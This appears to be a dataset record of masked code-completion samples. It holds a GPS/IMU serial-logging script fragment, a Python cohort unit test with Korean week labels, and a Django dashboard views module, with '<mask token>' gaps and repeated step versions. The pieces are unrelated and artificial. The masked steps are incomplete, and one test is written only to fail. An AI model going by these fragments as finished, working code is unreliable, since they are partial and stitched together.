icof2_az, icof2_alt\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode(\"ascii\").replace('\\r', '').replace('\\n', '')\n except:\n line = \"\"\n if len(line) > 0 and line[0] == \"$\":\n return line\n\ndef nmea_tester(sentence):\n mes = nmea.nmea(sentence)\n print(\"Checksum: \")\n print(mes.checksum())\n print(\"Reformatted Date & Time: \")\n print(mes.get_date())\n print(mes.get_time())\n print(\"Lat, Lon: \")\n print(str(mes.get_lat()) + \", \" + str(mes.get_lon()))\n print(\"Heading, MagVar\")\n print(str(mes.get_magnetic_heading()) + \", \" + str(mes.get_magnetic_var()))\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n 
try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\ndef display_stats(orient, position, obs):\n try:\n print(\"\\n\"*65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(''' _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\:::.......:::/\n ':::::::::::'\n `'\"\"\"'`\\n\\n''')\n print(\"Time: {}\\n\".format(ephem.now()))\n\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'\n .format(fix = position.is_fixed(), lat = obs.lat, lon = obs.lon))\n print(position.unparsed)\n\n print(\"Sensor\\n===\")\n print('Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, '\\\n 'Roll: {roll:7.2f}\\n---'.format(heading = orient.get_heading(),\n pitch = orient.get_pitch(),\n roll = orient.get_roll()))\n print('CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]},'\\\n ' Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\"\\nMagnetic Declination: {magvar:7.2f}, \"\n \"Adjusted Heading: {true_heading:7.2f}\"\n .format(magvar = magvar,\n true_heading= (orient.get_heading() +\n magvar+720)%360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'\n .format(bearing = position.get_bearing(),\n speed = position.get_speed()))\n except:\n pass\n \n\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n\nhome = reset()\nard = setup_serial(arduino_port, 115200)\ncounter = time.time()\nf = open(\"logs/log_\"+str(float(ephem.now()))+\".csv\", 'w')\nf.write(\"Epoch Time,Speed,Sensor,GPS,Waypoint\\n\")\norient = orientation.orientation(\"$IMU,0,0,0,0,0,0,0,0,0\")\nposition = nmea.nmea(\"$GPRMC,0,V,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\")\nmagvar = get_magnetic_var(float(last_lat), float(last_lon))\n\nclass myThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n\n def run(self):\n 
global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == \"q\":\n break\n val = chr(ord(val) + 1)\n pass\n\nthread1 = myThread()\n\nthread1.start()\n\nwhile True:\n mes = (read_message(ard))\n if mes[:2] == \"$G\":\n try:\n position = nmea.nmea(mes)\n except:\n pass\n elif mes[:2] == \"$I\":\n try:\n orient = orientation.orientation(mes)\n except:\n pass\n # home.date = \"2016-06-28 12:00:00\"\n\n # Operate the antenna if the satellite's elevation is greater than 10\n # degrees\n # If the elevation IS above 10 degrees and the antenna is parked, then\n # unlatch the park_latch variable\n home = update_gps(position, home)\n home.date = ephem.now()\n\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n\n display_stats(orient, position, home)\n print(val)\n if time.time() - counter >= 1.0:\n counter = time.time()\n try:\n f.write(str(ephem.now())+\",\")\n f.write(str(position.get_speed())+\",\")\n f.write(str(orient.get_heading())+\",\")\n f.write(str(position.get_bearing())+\",\")\n f.write(val+\"\\n\")\n except:\n f.write(\"x\\n\")\n if ii == \"q\":\n f.close()\n break\n\n''' icof2_az, icof2_alt = get_sat_position(icof2, home)\n if (icof2_alt >= min_elevation):\n antenna.set_position(icof2_az - heading, icof2_alt)\n\n else:\n antenna.park()'''\n", "step-ids": [ 15, 18, 21, 25, 26 ] }
[ 15, 18, 21, 25, 26 ]
<|reserved_special_token_0|> class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), 
anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) def testSnapshots(self): self.fail('should test this! but take too long network time') <|reserved_special_token_1|> <|reserved_special_token_0|> __author__ = 'continueing' class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) def testSnapshots(self): self.fail('should test this! 
but take too long network time') <|reserved_special_token_1|> from unittest.case import TestCase from datetime import datetime from src.main.domain.Cohort import Cohort from src.main.domain.Group import Group from src.main.util.TimeFormatter import TimeFormatter __author__ = 'continueing' class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) def testSnapshots(self): self.fail('should test this! 
but take too long network time') <|reserved_special_token_1|> from unittest.case import TestCase from datetime import datetime from src.main.domain.Cohort import Cohort from src.main.domain.Group import Group from src.main.util.TimeFormatter import TimeFormatter __author__ = 'continueing' class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname="5월 1째 주") self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname="5월 2째 주") self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname="5월 3째 주") self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname="5월 4째 주") self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(),4) def testSnapshots(self): self.fail("should test this! but take too long network time")
flexible
{ "blob_id": "f12bdfc054e62dc244a95daad9682790c880f20d", "index": 5367, "step-1": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, 
group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n", "step-3": "<mask token>\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! 
but take too long network time')\n", "step-4": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! 
but take too long network time')\n", "step-5": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7)\n groups = cohort.groups\n\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname=\"5월 1째 주\")\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname=\"5월 2째 주\")\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname=\"5월 3째 주\")\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname=\"5월 4째 주\")\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(),4)\n\n def testSnapshots(self):\n self.fail(\"should test this! but take too long network time\")\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
<|reserved_special_token_0|> def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request) ) def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). 
order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = ( '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>' ) return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request) ) def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). 
order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = ( '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>' ) return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) def push_to_context(sessionName, contextName, context, request): if sessionName in request.session: context[contextName] = request.session[sessionName] del request.session[sessionName] <|reserved_special_token_1|> from django.http import HttpResponse from django.shortcuts import render_to_response from django.template import RequestContext from django.db.models import Q from cvmo import settings from cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry from cvmo.context.plugins import ContextPlugins from cvmo.context.utils.views import uncache_response from cvmo.context.utils.views import get_list_allowed_abstract def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request) ) def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). 
order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = ( '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>' ) return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) def push_to_context(sessionName, contextName, context, request): if sessionName in request.session: context[contextName] = request.session[sessionName] del request.session[sessionName] <|reserved_special_token_1|> from django.http import HttpResponse from django.shortcuts import render_to_response from django.template import RequestContext from django.db.models import Q from cvmo import settings from cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry from cvmo.context.plugins import ContextPlugins from cvmo.context.utils.views import uncache_response from cvmo.context.utils.views import get_list_allowed_abstract def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request)) def dashboard(request): context = { 'context_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=False)).order_by('-public', 'name'), 'full_abstract_list': get_list_allowed_abstract(request), 'my_abstract_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=True)).order_by('name'), 'cluster_list': 
ClusterDefinition.objects.filter(owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user) } context["webapi_configurations"] = settings.WEBAPI_CONFIGURATIONS push_to_context("redirect_msg_info", "msg_info", context, request) push_to_context("redirect_msg_error", "msg_error", context, request) push_to_context("redirect_msg_warning", "msg_warning", context, request) push_to_context("redirect_msg_confirm", "msg_confirm", context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = "<h1>404 - Not found</h1><p>This is not the website you are looking for</p>" return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) def push_to_context(sessionName, contextName, context, request): if sessionName in request.session: context[contextName] = request.session[sessionName] del request.session[sessionName]
flexible
{ "blob_id": "4db8b4403dd9064b7d5f935d4b9d111508c965fb", "index": 1268, "step-1": "<mask token>\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request)\n )\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n 
push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\ndef test(request):\n raw = (\n '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>'\n )\n return render_to_response('core/raw.html', {'body': raw},\n RequestContext(request))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request)\n )\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\ndef test(request):\n raw = (\n '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>'\n )\n return render_to_response('core/raw.html', {'body': raw},\n RequestContext(request))\n\n\ndef push_to_context(sessionName, contextName, context, request):\n if sessionName in 
request.session:\n context[contextName] = request.session[sessionName]\n del request.session[sessionName]\n", "step-4": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.db.models import Q\nfrom cvmo import settings\nfrom cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry\nfrom cvmo.context.plugins import ContextPlugins\nfrom cvmo.context.utils.views import uncache_response\nfrom cvmo.context.utils.views import get_list_allowed_abstract\n\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request)\n )\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\ndef test(request):\n raw = (\n '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>'\n )\n return render_to_response('core/raw.html', {'body': raw},\n RequestContext(request))\n\n\ndef push_to_context(sessionName, contextName, context, request):\n if 
